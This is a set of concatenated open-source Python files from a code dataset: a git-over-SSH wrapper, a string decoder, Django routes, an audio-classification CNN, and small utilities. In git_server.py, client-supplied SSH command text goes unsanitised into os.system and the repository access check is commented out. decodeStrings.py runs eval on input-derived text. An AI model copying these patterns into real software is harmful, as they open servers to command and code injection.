test_metadata_file=\"tests/test_data/test_metadata.out\"\n )\n self.assertEqual(\n [test_start_time, config_file], [1610944442298, \"test_data_run_config.json\"]\n )\n\n def test_ConstructConfigDataframe(self):\n [test_name, config_df] = ConstructConfigDataframe(\n \"tests/test_data/test_data_run_config.json\"\n )\n print(config_df)\n self.assertEqual(\n [test_name, set(config_df[\"application\"].unique())],\n [\"test_data_run\", {\"primes-python\"}],\n )\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"PrincetonUniversity/faas-profiler","sub_path":"tests/unit_tests/WorkloadAnalyzer_test.py","file_name":"WorkloadAnalyzer_test.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"en","doc_type":"code","stars":100,"dataset":"github-code","pt":"37"} +{"seq_id":"19675774547","text":"#!/usr/bin/env python\n\n### To use this file add lines in .ssh/authorized_keys like the following:\n### command=\"/usr/bin/python /path/to/gaas/git_server.py --user=heynemann --conf /path/to/gaas/gaas.conf\",no-port-forwarding,no-X11-forwarding,no-agent-forwarding,no-pty ssh-rsa \n\nimport sys\nimport os\nfrom os.path import abspath\nimport argparse\n\nfrom gaas.config import Config\n\n\ndef parse_arguments(arguments):\n parser = argparse.ArgumentParser(description='git_server.py is a server for ssh git repos.')\n\n parser.add_argument('-u', '--user', help='User identified by the given ssh key.')\n parser.add_argument('-c', '--config', help='Configuration file path.')\n\n args = parser.parse_args(arguments)\n\n config_path = abspath(args.config)\n\n return {\n 'user': args.user,\n 'config_path': config_path\n }\n\ndef main(arguments):\n options = parse_arguments(arguments)\n user = options['user']\n config_path = options['config_path']\n\n config = Config.load(config_path)\n\n command = os.environ['SSH_ORIGINAL_COMMAND']\n\n userMap = {'username': ['reponame', 'reponame2'],\n 'username2': ['reponame2', 'reponame3']}\n if user 
and command:\n command_parts = command.split()\n\n if command_parts[0] in ['git-receive-pack', 'git-upload-pack']:\n #if command.split()[1] in [\"'/path/to/repositories/\" + r + \".git'\" for r in userMap[user]]:\n new_command = \"%s '%s/%s'\" % (command_parts[0], config.GIT_ROOT.rstrip('/'), command_parts[1].strip(\"'\").lstrip('/'))\n os.system('exec git-shell -c \"' + new_command + '\"')\n #else:\n #sys.stderr.write(\"You can't access this repository.\")\n\nif __name__ == '__main__':\n main(sys.argv[1:])\n","repo_name":"heynemann/gaas","sub_path":"gaas/git_server.py","file_name":"git_server.py","file_ext":"py","file_size_in_byte":1769,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"38439971769","text":"#!/usr/bin/python3\ndef decodeStrings(s):\n \"\"\" Sorts letters in string s\n by the order they occur in string t\n Keyword arguments:\n s: string to sort\n t: string which letters sort string s\n \"\"\"\n list_s = list(s)\n for idx, letter in enumerate(list_s):\n if letter == '[':\n list_s[idx] = '*('\n elif letter == ']':\n list_s[idx] = ')'\n elif letter.isdigit():\n list_s[idx] = '+' + letter\n elif letter != '[' and letter != '*(' and letter != ')':\n list_s[idx] = '\"{}\"'.format(letter)\n decoded = ''.join(list_s)\n return eval(decoded)\n","repo_name":"kevanlucc/spotify_challenge","sub_path":"decodeStrings.py","file_name":"decodeStrings.py","file_ext":"py","file_size_in_byte":626,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26701669969","text":"from django.urls import path\nfrom src.apps.courses.api.v1.views import CourseListView, CourseDetailView, CourseCreateView, CategoryListView, \\\n CourseLessonsView, LessonVideoListView, VideoSingleView, CourseListByCategoryView\n\nurlpatterns = [\n path('list/', CourseListView.as_view(), name='course-list'),\n path('list/category//', CourseListByCategoryView.as_view(), name='course-list-by-category'),\n path('/', CourseDetailView.as_view(), name='course-detail'),\n path('create/', CourseCreateView.as_view(), name='course-create'),\n # path('/update/', CourceUpdateView.as_view(), name='course-update'),\n # path('/delete/', CourceDeleteView.as_view(), name='course-delete'),\n path('categories/', CategoryListView.as_view(), name='category-list'),\n # path('category/create/', CategoryCreateView.as_view(), name='category-create'),\n # path('category//update/', CategoryUpdateView.as_view(), name='category-update'),\n # path('category//delete/', CategoryDeleteView.as_view(), name='category-delete'),\n path('/lessons/', CourseLessonsView.as_view(), name='lesson-list'),\n # path('lesson//', CourseLessonsView.as_view(), name='lesson-detail'),\n # path('lesson/create/', LessonCreateView.as_view(), name='lesson-create'),\n # path('lesson//update/', LessonUpdateView.as_view(), name='lesson-update'),\n # path('lesson//delete/', LessonDeleteView.as_view(), name='lesson-delete'),\n path('lesson//', LessonVideoListView.as_view(), name='video-list'),\n path('//', VideoSingleView.as_view(), name='video-detail'),\n # path('lesson/video/create/', VideoCreateView.as_view(), name='video-create'),\n # path('lesson/video//update/', VideoUpdateView.as_view(), name='video-update'),\n # path('lesson/video//delete/', VideoDeleteView.as_view(), 
name='video-delete'),\n]","repo_name":"tim646/ayoluchun.uz","sub_path":"src/apps/courses/api/v1/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1954,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"17896070481","text":"# -*- coding: utf-8 -*-\nimport pykintone\nfrom pykintone import model\nimport pykintone.structure_field as sf\n\n\nclass BusinessCard(model.kintoneModel):\n\n def __init__(self, app, name, company, location, impression, submitter, image_path):\n super(BusinessCard, self).__init__()\n self.name = name\n self.company = company\n self.location = location\n self.impression = impression\n self.submitter = submitter\n self.image = [sf.File.upload(image_path, app)]\n\n\ndef create_card(comment, entities, file_path, submitter, conf_path):\n app = pykintone.load(conf_path).app()\n\n name, company, location = entities['PERSON'], entities['ORGANIZATION'], entities['LOCATION']\n card = BusinessCard(app, name, company, location, comment, submitter, file_path)\n result = app.create(card)\n\n if result.ok:\n return result\n else:\n print(result.error)\n","repo_name":"Hironsan/kintone-handson","sub_path":"plugins/apis/kintone.py","file_name":"kintone.py","file_ext":"py","file_size_in_byte":906,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"37"} +{"seq_id":"2632335452","text":"import os\nimport datetime\nimport pandas as pd\nimport numpy as np\nimport soundfile as sf\n\nimport tensorflow as tf\nimport tensorflow_io as tfio\nfrom matplotlib import pyplot as plt\nimport keras.models\nfrom keras.utils import to_categorical\nfrom keras import Model\nfrom keras.layers import Flatten, Dense, Dropout, GaussianNoise, Input, BatchNormalizationV1\nfrom keras import regularizers\nfrom keras.applications.vgg16 import VGG16\nfrom keras.applications import ResNet50V2\nfrom sklearn.preprocessing import LabelEncoder\n\nimport tensorflowjs as tfjs\n\n# Loads in audio file and return wav data\ndef load_audio(file_path):\n audio_data, sample_rate = sf.read(file_path.numpy())\n return audio_data\n\n\n# Takes in a file and returns a processed (224, 224, 3) spectrogram\ndef preprocess(file_path, training):\n [wav, ] = tf.py_function(load_audio, [file_path], [tf.float32])\n wav = wav[:960000]\n zero_padding = tf.zeros([960000] - tf.shape(wav), dtype=tf.float32)\n wav = tf.concat([zero_padding, wav], 0)\n\n spectrogram = tfio.audio.spectrogram(\n wav, nfft=2048, window=2048, stride=int(960000/224) + 1)\n\n mel_spectrogram = tfio.audio.melscale(\n spectrogram, rate=32000, mels=224, fmin=500, fmax=13000)\n\n dbscale_mel_spectrogram = tfio.audio.dbscale(\n mel_spectrogram, top_db=80)\n\n if training:\n freq_mask = tfio.audio.freq_mask(dbscale_mel_spectrogram, param=5)\n time_mask = tfio.audio.time_mask(freq_mask, param=5)\n time_mask = tf.expand_dims(time_mask, axis=2)\n time_mask = tf.repeat(time_mask, repeats=3, axis=2)\n noise = tf.random.normal(shape=tf.shape(time_mask), mean=0.0, stddev=.2, dtype=tf.float32)\n output = time_mask + noise\n output = tf.divide(\n tf.add(tf.subtract(\n output,\n tf.reduce_min(output)\n ), tf.keras.backend.epsilon()),\n tf.maximum(tf.subtract(\n tf.reduce_max(output),\n tf.reduce_min(output)\n ), tf.keras.backend.epsilon() * 2),\n )\n return output\n else:\n dbscale_mel_spectrogram = tf.expand_dims(dbscale_mel_spectrogram, axis=2)\n dbscale_mel_spectrogram = tf.repeat(dbscale_mel_spectrogram, repeats=3, axis=2)\n dbscale_mel_spectrogram = tf.divide(\n 
tf.add(tf.subtract(\n dbscale_mel_spectrogram,\n tf.reduce_min(dbscale_mel_spectrogram)\n ), tf.keras.backend.epsilon()),\n tf.maximum(tf.subtract(\n tf.reduce_max(dbscale_mel_spectrogram),\n tf.reduce_min(dbscale_mel_spectrogram)\n ), tf.keras.backend.epsilon() * 2),\n )\n return dbscale_mel_spectrogram\n\n\n# Takes in a file path and returns the spectrogram and label\ndef process_training_images(file_path, label):\n spectrogram = preprocess(file_path, True)\n return spectrogram, label\n\n\ndef process_non_training_images(file_path, label):\n spectrogram = preprocess(file_path, False)\n return spectrogram, label\n\n\n# Takes in an optional cutoff point and returns the dataset, number of labels, and csv dataframe\ndef load_data(cutoff):\n global label_encoder\n cols = [\"filename\", \"primary_label\", \"secondary_labels\", \"common_name\"]\n df = pd.read_csv(\"./Data/train_metadata.csv\", usecols=cols)\n if cutoff is not None:\n df = df.loc[df['primary_label'] <= cutoff]\n #counts = df['primary_label'].value_counts()\n #df = df[~df['primary_label'].isin(counts[counts < 50].index)] # Removes birds that have less than 50 calls from df\n untouched_df = df.copy()\n df['file_path'] = df.apply(lambda row: \"./Data/Audio/\" + row.primary_label + \"/\" + row.filename, axis=1)\n images = df[\"file_path\"]\n\n labels = df.pop('common_name')\n labels = to_categorical(label_encoder.fit_transform(labels))\n\n output = tf.data.Dataset.from_tensor_slices((images, labels))\n return output, labels.shape[1], untouched_df\n\n\n# Takes in data and a batch size, prepares the data for training, and returns\ndef setup_training_data(data, batch_size):\n autotune = tf.data.experimental.AUTOTUNE\n\n data = data.map(process_training_images, num_parallel_calls=autotune)\n data = data.shuffle(buffer_size=50000, seed=0)\n data = data.batch(batch_size)\n data = data.prefetch(autotune)\n return data\n\n\ndef setup_non_training_data(data, batch_size):\n autotune = tf.data.experimental.AUTOTUNE\n\n data = data.map(process_non_training_images, num_parallel_calls=autotune)\n data = data.shuffle(buffer_size=50000, seed=0)\n data = data.batch(batch_size)\n data = data.prefetch(autotune)\n return data\n\n\n# Creates a new model using VGG16 cnn architecture with transfer learning\ndef create_model(num_labels):\n input_layer = Input(shape=(224, 224, 3))\n cnn = keras.applications.ResNet50V2(input_tensor=input_layer, weights='imagenet', include_top=False)\n\n for layer in cnn.layers:\n layer.trainable = False\n\n x = Flatten()(cnn.output)\n output = Dense(units=num_labels, activation='softmax')(x)\n\n model = Model([input_layer], [output])\n optimizer = keras.optimizers.Adam(learning_rate=0.0001)\n model.compile(optimizer=optimizer, loss='categorical_crossentropy',\n metrics=[keras.metrics.CategoricalAccuracy(), keras.metrics.Recall(), keras.metrics.Precision()])\n return model\n\n\n# Trains the model on given data\ndef train_model(training_model, training_data, validation_data, num_labels, epoch_amt, save):\n if training_model is None:\n training_model = create_model(num_labels)\n\n training_model.summary()\n\n log_dir = \"logs/fit/\" + datetime.datetime.now().strftime(\"%Y%m%d-%H%M%S\")\n tensorboard_callback = tf.keras.callbacks.TensorBoard(log_dir=log_dir, histogram_freq=1)\n checkpoint = keras.callbacks.ModelCheckpoint(filepath=\"best_model\",\n mode='max',\n monitor='val_categorical_accuracy',\n save_best_only=True)\n\n training_model.fit(training_data, validation_data=validation_data, epochs=epoch_amt,\n 
callbacks=[tensorboard_callback, checkpoint], verbose=True)\n\n if save:\n training_model.save(\"model\")\n tfjs.converters.save_keras_model(training_model, \"js_model\")\n\n return training_model\n\n\n# Takes in an audio file and model and returns predicted bird\ndef predict_file(file_path):\n global model\n image = preprocess(file_path, False)\n image = image.numpy().reshape(1, 224, 224, 3)\n predicted_label = model.predict([image], verbose=False)\n return predicted_label\n\n\n# Takes in audio file and prints a detailed description of the prediction\ndef detailed_prediction(file_path, show_amount):\n global label_encoder\n prediction = predict_file(file_path)[0]\n max_indexes = np.argpartition(prediction, -show_amount)[-show_amount:]\n max_indexes = max_indexes[np.argsort(prediction[max_indexes])]\n max_indexes = np.flip(max_indexes)\n for index in range(len(max_indexes)):\n confidence = prediction[max_indexes[index]]\n class_prediction = label_encoder.inverse_transform([max_indexes[index]])\n print(class_prediction + \" with \" + str(round(confidence * 100, 2)) + \"% confidence\")\n\n\n# Takes in csv dataframe and prints out one by one the success of a prediction on each file\ndef predict_all(df):\n global label_encoder\n count = 0\n correct = 0\n\n for index_num, row in df.iterrows():\n count += 1\n prediction = predict_file(\"./Data/Audio/\" + row[\"primary_label\"] + \"/\" + row[\"filename\"])\n classes_x = np.argmax(prediction, axis=1)\n prediction_class = label_encoder.inverse_transform(classes_x)\n if prediction_class[0] == row[\"common_name\"]:\n correct += 1\n print(str(correct / count) + \": \" + row[\"common_name\"] + \" - \" + prediction_class)\n print(\"FINAL RESULT: \" + str(correct / count))\n\n\n# Takes in the testing data, training data, and dataframe of training csv and prints out some checks\ndef check_model(testing_data, df, show_amount):\n global model\n\n print(\"EVALUATING ON TESTING DATA\")\n model.evaluate(testing_data)\n\n test_file = \"./Data/Audio/acafly/XC31063.ogg\"\n print(\"PREDICTING \" + test_file)\n detailed_prediction(test_file, show_amount)\n\n test_file = \"./Data/Audio/amecro/XC80525.ogg\"\n print(\"PREDICTING \" + test_file)\n detailed_prediction(test_file, show_amount)\n\n test_file = \"./Data/Audio/banswa/XC138873.ogg\"\n print(\"PREDICTING \" + test_file)\n detailed_prediction(test_file, show_amount)\n\n test_file = \"./Data/Audio/caltow/XC126344.ogg\"\n print(\"PREDICTING \" + test_file)\n detailed_prediction(test_file, show_amount)\n\n test_file = \"./Data/Audio/foxspa/XC120607.ogg\"\n print(\"PREDICTING \" + test_file)\n detailed_prediction(test_file, show_amount)\n\n print(\"EVALUATING ON ALL DATA\")\n predict_all(df[::100])\n\n\nif __name__ == \"__main__\":\n TRAINING_SIZE = .60\n VALIDATION_SIZE = .20\n BATCH_SIZE = 16\n EPOCH_AMOUNT = 10\n SHOW_AMOUNT = 5\n label_encoder = LabelEncoder()\n\n dataset, label_count, saved_df = load_data(cutoff=\"amewig\")\n dataset = dataset.shuffle(buffer_size=75000, seed=0)\n\n training_size = int(len(dataset) * TRAINING_SIZE)\n validating_size = int(len(dataset) * VALIDATION_SIZE)\n testing_size = int(len(dataset) - training_size - validating_size)\n\n train = dataset.take(training_size)\n testing_dataset = dataset.skip(training_size)\n validation = testing_dataset.skip(validating_size)\n testing = testing_dataset.take(validating_size)\n\n train = setup_training_data(train, BATCH_SIZE)\n validation = setup_non_training_data(validation, BATCH_SIZE)\n testing = setup_non_training_data(testing, 
BATCH_SIZE)\n\n \"\"\"\n for x in train:\n print(np.min(x[0][0].numpy()))\n print(np.max(x[0][0].numpy()))\n plt.imshow(x[0][0].numpy())\n plt.show()\n break\n for x in validation:\n print(np.min(x[0][0].numpy()))\n print(np.max(x[0][0].numpy()))\n plt.imshow(x[0][0].numpy())\n plt.show()\n break\n for x in testing:\n print(np.min(x[0][0].numpy()))\n print(np.max(x[0][0].numpy()))\n plt.imshow(x[0][0].numpy())\n plt.show()\n break\n \"\"\"\n\n #model = keras.models.load_model(\"best_model\")\n model = train_model(training_model=None, training_data=train, validation_data=validation, num_labels=label_count,\n epoch_amt=EPOCH_AMOUNT, save=True)\n # Accuracy on data\n check_model(testing_data=testing, df=saved_df, show_amount=SHOW_AMOUNT)\n#\n # tensorboard --logdir=logs/fit --host localhost --port 8088","repo_name":"Schwar32/SE-Machine-Learning","sub_path":"PureCNN-DataLoader.py","file_name":"PureCNN-DataLoader.py","file_ext":"py","file_size_in_byte":10745,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"31682734741","text":"from ludwig.api import LudwigModel\nimport click\n\n\n@click.command\n@click.option(\n \"--data-file-path\",\n \"-f\",\n type=click.Path(exists=True),\n help=\"Path to data file to run the inference\",\n required=True,\n)\n@click.option(\n \"--model-dir\",\n \"-m\",\n type=click.Path(exists=True),\n help=\"Path to the trained model directory\",\n required=True,\n)\ndef main(data_file_path, model_dir):\n model = LudwigModel.load(model_dir)\n predictions, _ = model.predict(dataset=data_file_path)\n predictions = predictions[\n [\n \"label_predictions\",\n \"label_probabilities_0\",\n \"label_probabilities_1\",\n \"label_probabilities_2\",\n \"label_probabilities_3\",\n \"label_probabilities_4\",\n \"label_probabilities_5\",\n ]\n ]\n predictions.to_csv(\"predictions.csv\")\n\n\nif __name__ == \"__main__\":\n # pylint: disable=no-value-for-parameter\n main()\n","repo_name":"guptashrey/AutoML-with-Ludwig","sub_path":"predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":942,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"14377518358","text":"import os\nimport time\n\nclass Configuration(object):\n \n '''參數設定'''\n def __init__(self):\n\n '''訓練資料路徑'''\n self.training_data_folder = \"/app/data/phm-ieee-2012-data-challenge-dataset-master/Learning_set\"\n self.testing_data_folder = \"/app/data/phm-ieee-2012-data-challenge-dataset-master/Full_Test_Set\"\n\n '''測試集'''\n self.contest_testing_data_folder = \"/app/data/phm-ieee-2012-data-challenge-dataset-master/Test_set\"\n\n '''執行檔路徑'''\n working_dir = os.getcwd() #返還main.py檔案資料夾\n self.featured_data_folder = os.path.join(working_dir, \"assets/feature_data\")\n self.model_folder = os.path.join(working_dir, \"assets/models\")\n\n '''訓練參數'''\n self.lag_feature_number = 15\n self.rul_upper_bound = 750\n\n \n\n\n","repo_name":"myfirstjump/BearingRULPrediction","sub_path":"py_module/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":844,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"33026769098","text":"from django.shortcuts import render\r\nfrom django.http import HttpResponse\r\n# First Request\r\n# def index(request):\r\n# \treturn HttpResponse(\"Hello World\")\r\n\r\n# Second Request\r\nfrom .forms import StudentForm\r\n\r\ndef index(request):\r\n\tif request.method=='POST':\r\n\t\tform = 
StudentForm(request.POST)\r\n\t\tif form.is_valid():\r\n\t\t\tform.save()\r\n\tform = StudentForm()\r\n\treturn render(request,'index.html',{'form':form})\r\n","repo_name":"Harshvalecha31/Django_Testing_End_to_End","sub_path":"firstapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"17228993679","text":"import os\nimport sys\nimport shutil\nimport json\nimport re\n\nfrom datetime import datetime\nfrom osgeo import ogr, osr\n\n\n# copied from stitch_ifgs.get_union_polygon()\ndef get_union_polygon(ds_files):\n \"\"\"\n Get GeoJSON polygon of union of IFGs.\n :param ds_files: list of .dataset.json files, which have the 'location' key\n :return: geojson of merged bbox\n \"\"\"\n\n geom_union = None\n for ds_file in ds_files:\n f = open(ds_file)\n ds = json.load(f)\n geom = ogr.CreateGeometryFromJson(json.dumps(ds['location'], indent=2, sort_keys=True))\n if geom_union is None:\n geom_union = geom\n else:\n geom_union = geom_union.Union(geom)\n return json.loads(geom_union.ExportToJson()), geom_union.GetEnvelope()\n\n\ndef get_dataset_met_json_files(cxt):\n \"\"\"\n returns 2 lists: file paths for dataset.json files and met.json files\n :param cxt: json from _context.json\n :return: list[str], list[str]\n \"\"\"\n pwd = os.getcwd()\n localize_urls = cxt['localize_urls']\n\n met_files, ds_files = [], []\n for localize_url in localize_urls:\n local_path = localize_url['local_path']\n slc_id = local_path.split('/')[0]\n slc_path = os.path.join(pwd, slc_id, slc_id)\n\n ds_files.append(slc_path + '.dataset.json')\n met_files.append(slc_path + '.met.json')\n return ds_files, met_files\n\n\ndef get_scenes(cxt):\n \"\"\"\n gets all SLC scenes for the stack\n :param cxt: contents for _context.json\n :return: list of scenes\n \"\"\"\n localize_urls = cxt['localize_urls']\n all_scenes = set()\n for localize_url in localize_urls:\n local_path = localize_url['local_path']\n slc_id = local_path.split('/')[0]\n all_scenes.add(slc_id)\n return sorted(list(all_scenes))\n\n\ndef get_min_max_timestamps(scenes_ls):\n \"\"\"\n returns the min timestamp and max timestamp of the stack\n :param scenes_ls: list[str] all slc scenes in stack\n :return: (str, str) 2 timestamp strings, ex. 
20190518T161611\n \"\"\"\n timestamps = set()\n\n regex_pattern = r'(\\d{8}T\\d{6}).(\\d{8}T\\d{6})'\n for scene in scenes_ls:\n matches = re.search(regex_pattern, scene)\n if not matches:\n raise Exception(\"regex %s was unable to match with SLC id %s\" % (regex_pattern, scene))\n\n slc_timestamps = (matches.group(1), matches.group(2))\n timestamps = timestamps.union(slc_timestamps)\n\n min_timestamp = min(timestamps)\n max_timestamp = max(timestamps)\n return min_timestamp.replace('T', ''), max_timestamp.replace('T', '')\n\n\ndef create_list_from_keys_json_file(json_files, *args):\n \"\"\"\n gets all key values in each .json file and returns a sorted array of values\n :param json_files: list[str]\n :return: list[]\n \"\"\"\n values = set()\n for json_file in json_files:\n f = open(json_file)\n data = json.load(f)\n for arg in args:\n value = data[arg]\n values.add(value)\n return sorted(list(values))\n\n\ndef camelcase_to_underscore(name):\n s1 = re.sub('(.)([A-Z][a-z]+)', r'\\1_\\2', name)\n return re.sub('([a-z0-9])([A-Z])', r'\\1_\\2', s1).lower()\n\n\ndef get_key_and_convert_to_underscore(json_file_paths, key):\n \"\"\"\n read through all the json files in file paths, get the first occurrence of key and convert it to underscore\n :param json_file_paths: list[str]\n :param key: str\n :return: key and value\n \"\"\"\n for json_file in json_file_paths:\n f = open(json_file)\n data = json.load(f)\n if key in data.keys():\n underscore_key = camelcase_to_underscore(key)\n return underscore_key, data[key]\n return None, None\n\n\ndef generate_dataset_json_data(dataset_json_files, version):\n \"\"\"\n :param cxt: _context.json file\n :param dataset_json_files: list[str] all file paths of SLC's .dataset.json files\n :param version: str: version, ex. v1.0\n :return: dict\n \"\"\"\n dataset_json_data = dict()\n dataset_json_data['version'] = version\n\n sensing_timestamps = create_list_from_keys_json_file(dataset_json_files, 'starttime', 'endtime')\n dataset_json_data['starttime'] = min(sensing_timestamps)\n dataset_json_data['endtime'] = max(sensing_timestamps)\n\n geojson, image_corners = get_union_polygon(dataset_json_files)\n dataset_json_data['location'] = geojson\n\n return dataset_json_data\n\n\ndef generate_met_json_data(cxt, met_json_file_paths, dataset_json_files, version):\n \"\"\"\n :param cxt: _context.json file\n :param met_json_file_paths: list[str] all file paths of SLC's .met.json files\n :param dataset_json_files: list[str] all file paths of SLC's .dataset.json files\n :param version: str: version, ex. 
v1.0\n :return: dict\n \"\"\"\n met_json_data = {\n 'processing_start': os.environ['PROCESSING_START'],\n 'processing_stop': datetime.now().strftime('%Y-%m-%dT%H:%M:%S'),\n 'version': version\n }\n\n first_occurrence_keys = [\n 'direction',\n 'orbitNumber',\n 'trackNumber',\n 'sensor',\n 'platform'\n ]\n for key in first_occurrence_keys:\n key, value = get_key_and_convert_to_underscore(met_json_file_paths, key)\n met_json_data[key] = value\n\n orbit_cycles = create_list_from_keys_json_file(met_json_file_paths, 'orbitCycle')\n met_json_data['orbit_cycles'] = orbit_cycles\n\n # generating bbox\n geojson, image_corners = get_union_polygon(dataset_json_files)\n coordinates = geojson['coordinates'][0]\n for coordinate in coordinates:\n coordinate[0], coordinate[1] = coordinate[1], coordinate[0]\n met_json_data['bbox'] = coordinates\n\n # list of SLC scenes\n scenes = get_scenes(cxt)\n met_json_data['scenes'] = scenes\n met_json_data['scene_count'] = len(scenes)\n\n # getting timestamps\n sensing_timestamps = create_list_from_keys_json_file(dataset_json_files, 'starttime', 'endtime')\n met_json_data['sensing_start'] = min(sensing_timestamps)\n met_json_data['sensing_stop'] = max(sensing_timestamps)\n met_json_data['timesteps'] = sensing_timestamps\n\n # additional information\n met_json_data['dataset_type'] = 'stack'\n\n return met_json_data\n","repo_name":"aria-jpl/topsstack","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":6176,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"75192103146","text":"#%%\nfrom bs4 import BeautifulSoup\n\n#%%\n# TEST------------------------------------------\n#file_curr_path = os.path.normpath('C:/Users/lopm/Documents/gitprojects/call_graph_change_analyser/project_results/JKQtPlotter/.cache/JKQtPlotter/current/lib/jkqtplotter/jkqtpbaseplotterstyle.cpp.xml')\n#file_curr_path = os.path.normpath('C:/Users/lopm/Documents/mt/sandbox/stuff/uvcannode_compact.xml')\nfile_curr_path = os.path.normpath(\n 'C:/Users/lopm/Documents/mt/sandbox/stuff/jkqtpbaseplotterstyle_compact.xml')\n#file_curr_path = os.path.normpath('C:/Users/lopm/Documents/mt/sandbox/stuff/function_names_Compact.xml')\n\n# graphs/jkqtpscatter.cpp.xml')\n#file_prev_path = os.path.normpath('C:/Users/lopm/Documents/gitprojects/call_graph_change_analyser/project_results/JKQtPlotter/.cache/JKQtPlotter/previous/lib/jkqtplotter/jkqtpbaseplotterstyle.cpp.xml')\n\n\n#%%\ndef get_xml_objects(file_path):\n with open(file_path, 'r') as f:\n xml_data = f.read()\n Bs_data = BeautifulSoup(xml_data, \"xml\")\n return Bs_data\n\ndef get_function_name(function_tag):\n \"\"\"\n Returns the name of the function from the tags name_detail[label] or if nested name, the name_detail's inside the name_tag .\n \n This function is used for getting the name of functions in the function declaration. \n It searches just within the direct children of the current tag.\n \n Parameters:\n function_tag (BeautifulSoup.Tag): The Tag to get the name from, it can be a function or a constructor\n \n Returns:\n str: The name of the funciton (eg. 
JKQTPSetSystemDefaultBaseStyle or JKQTBasePlotterStyle::loadSettings)\n int: The defined number of parameters for this function\n \n \"\"\"\n function_name = ''\n for name_tag_indirect in function_tag.findAll('name_tag', recursive=False):\n for ct in name_tag_indirect.children:\n if ct.name == 'name_detail':\n function_name = \"\".join((function_name, ct['label']))\n if ct.name == 'operator':\n function_name = \"\".join((function_name, ct['label']))\n for name_detail_direct in function_tag.findAll('name_detail', recursive=False):\n function_name = name_detail_direct['label']\n return function_name, len(function_tag.parameter_list.findAll('parameter', recursive=False))\n\n\n\n","repo_name":"GLopezMUZH/call_graph_change_analyser","sub_path":"call_graph_change_analyser/compact_xml_parsing_cpp.py","file_name":"compact_xml_parsing_cpp.py","file_ext":"py","file_size_in_byte":2277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"22590575093","text":"\n\ndef main():\n with open(\"expression.txt\", \"r\") as f:\n expression = f.readline()\n try:\n notation = reverse_polish_notation(expression)\n except Exception as e:\n print(e)\n else:\n print(\" \".join(notation))\n\n\ndef reverse_polish_notation(expression: str) -> list:\n output_queue = []\n \"\"\"Output queue\"\"\"\n op_stack = []\n \"\"\"Operator stack\"\"\"\n\n l = len(expression)\n i = 0\n while i < l:\n if str(expression[i]) == \" \":\n \"\"\"Skip whitespace\"\"\"\n i += 1 # advance past the space; without this the loop never terminates\n continue\n if expression[i].isdigit() or expression[i] == '.':\n \"\"\"Digits (and dots) are collected into one number and pushed straight to the output queue\"\"\"\n digit = []\n dot_flag = 0\n while expression[i].isdigit() or expression[i] == '.':\n if expression[i] == '.':\n dot_flag += 1\n if dot_flag > 1:\n raise ValueError(\"Extra decimal point\")\n digit.append(expression[i])\n i += 1\n i -= 1\n output_queue.append(\"\".join(digit))\n elif is_operator(expression[i]):\n \"\"\"\n If it is an operator, pop and push by precedence.\n Let the incoming operator be O1 and the stack top be O2; while either:\n 1. O1 is left-associative and its precedence is less than or equal to O2's\n 2. O1 is right-associative and its precedence is less than O2's\n holds, pop O2 from the stack into the output queue,\n then push O1.\n \"\"\"\n while len(op_stack) > 0:\n top = op_stack[len(op_stack) - 1]\n is_left_assoc = left_assoc(expression[i])\n if (is_left_assoc and (op_precedence(expression[i]) <= op_precedence(top))) \\\n or ((not is_left_assoc) and (op_precedence(expression[i]) < op_precedence(top))):\n output_queue.append(op_stack.pop())\n else:\n break\n op_stack.append(expression[i])\n elif str(expression[i]) == \"(\":\n \"\"\"A left parenthesis is pushed directly onto the stack\"\"\"\n op_stack.append(expression[i])\n elif str(expression[i]) == \")\":\n \"\"\"On a right parenthesis, pop operators into the output queue until a left parenthesis appears; pop the left parenthesis without emitting it, and raise if none is found\"\"\"\n try:\n while True:\n s = op_stack.pop()\n if str(s) != \"(\":\n output_queue.append(s)\n else:\n break\n except IndexError:\n raise Exception(\"Unbalanced parentheses: missing left parenthesis\")\n else:\n \"\"\"Any other character raises an exception\"\"\"\n raise ValueError(\"Unknown character: \" + expression[i])\n i += 1\n\n while len(op_stack) > 0:\n \"\"\"Pop the remaining operators into the output queue; a '(' or ')' here means unbalanced parentheses\"\"\"\n op = op_stack.pop()\n if str(op) == \"(\" or str(op) == \")\":\n raise Exception(\"Unbalanced parentheses: extra parenthesis\")\n output_queue.append(op)\n return output_queue\n\n\ndef op_precedence(op: str) -> int:\n if op == \"+\" or op == \"-\":\n return 1\n elif op == \"*\" or op == \"/\":\n return 2\n elif op == \"^\":\n return 3\n else:\n return 0\n\n\ndef is_operator(c: str) -> bool:\n operators = (\"+\", \"-\", \"*\", \"/\", \"^\")\n try:\n operators.index(c)\n except ValueError:\n return False\n else:\n return True\n\n\ndef left_assoc(c: str) -> bool:\n left_assoc_operator = (\"+\", \"-\", \"*\", \"/\")\n try:\n left_assoc_operator.index(c)\n 
